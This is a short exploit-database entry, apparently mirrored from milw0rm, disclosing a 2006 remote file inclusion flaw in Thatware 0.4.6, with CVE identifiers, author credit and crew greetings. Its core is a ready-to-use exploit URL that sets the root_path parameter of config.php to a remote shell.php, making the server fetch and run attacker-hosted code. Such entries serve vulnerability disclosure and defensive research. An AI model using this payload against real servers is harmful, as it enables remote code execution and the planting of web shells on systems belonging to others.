Thatware 0.4.6 - 'ROOT_PATH' Remote File Inclusion



EKU-ID: 10172 CVE: OSVDB-29481;CVE-2006-4213;CVE-2002-2298 OSVDB-ID:
Author: Drago84 Published: 2006-08-10 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Thatware  0.4.6 (root_path) Remote File Inclusion

CreW: ToXiC

Bug Found by Drago84

Source Code:
http://ufpr.dl.sourceforge.net/sourceforge/thatware/thatware_0.4.6.tar.gz

Page Affect
config.php

ExP:
http://server/dir_thatware/config.php?root_path=http://server/shell.php'

Greatz: str0ke

# milw0rm.com [2006-08-10]